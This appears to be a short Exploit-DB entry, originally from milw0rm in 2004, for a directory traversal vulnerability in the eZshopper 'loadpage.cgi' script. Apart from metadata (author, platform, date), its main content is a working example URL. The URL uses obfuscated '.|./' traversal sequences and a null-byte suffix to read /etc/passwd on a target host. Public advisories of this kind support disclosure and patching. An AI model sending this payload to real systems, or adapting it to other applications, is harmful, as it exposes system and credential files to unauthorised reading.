Alex Heiphetz Group eZshopper - 'loadpage.cgi' Directory Traversal

EDB-ID:

659

Author:

Zero X

Type:

webapps

Platform:

CGI

Published:

2004-11-25

Example:

http://targethost/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html

# milw0rm.com [2004-11-25]